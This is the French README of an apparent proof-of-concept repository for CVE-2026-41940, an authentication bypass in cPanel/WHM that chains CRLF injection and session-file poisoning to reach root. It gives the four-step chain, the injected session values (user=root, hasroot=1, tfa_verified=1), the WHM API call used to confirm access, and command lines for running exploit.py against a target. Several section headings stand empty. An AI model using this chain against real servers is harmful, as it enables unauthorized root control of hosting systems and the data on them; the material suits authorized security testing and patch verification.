
Preuve de concept pour CVE-2026-41940, démontrant un contournement d'authentification dans cPanel/WHM via une injection CRLF et un empoisonnement de session pour obtenir un accès de niveau root.
Ce dépôt contient une preuve de concept (PoC) pour CVE-2026-41940, démontrant un contournement d'authentification en plusieurs étapes dans cPanel/WHM via une injection CRLF et un empoisonnement de session.
Avertissement : Ce code est destiné uniquement à des tests de sécurité éducatifs et autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.
Ce PoC reproduit une chaîne d'exploitation réelle basée sur des techniques observées par Hadrian et watchTowr.
La vulnérabilité permet à un attaquant de :
L'exploit suit un processus en 4 étapes :
Envoie une requête de connexion avec des identifiants invalides Extrait un cookie de session valide (whostmgrsession / cpsession)
Envoie un en-tête Authorization conçu (encodé en base64) Injecte des paires clé-valeur malveillantes dans le fichier de session
La charge utile injectée comprend :
user=root
hasroot=1
tfa_verified=1
cp_security_token=/cpsessXXXXXXXXXX
Force cPanel à réécrire le fichier de session Peut conserver les valeurs malveillantes injectées
Appelle le point de terminaison de l'API WHM :
/json-api/version?api.version=1
En cas de succès :
Installer la dépendance :
pip install requests
python3 exploit.py --host <cible>
--ssl Utiliser HTTPS--port Spécifier un port personnalisé--verbose Activer la sortie de débogagepython3 exploit.py --host example.com --ssl --port 2087 --verbose
Exploitation réussie :
[+] SUCCÈS ! Authentifié en tant que root via CVE-2026-41940.
[+] Cookie : whostmgrsession=...
[+] URL d'administration : https://cible:2087/cpsess.../json-api/version?api.version=1
Si vous êtes administrateur système :
La vulnérabilité réside dans :
L'exploit abuse de :
Ce PoC est fourni tel quel pour :
Toute utilisation non autorisée peut enfreindre les lois et réglementations.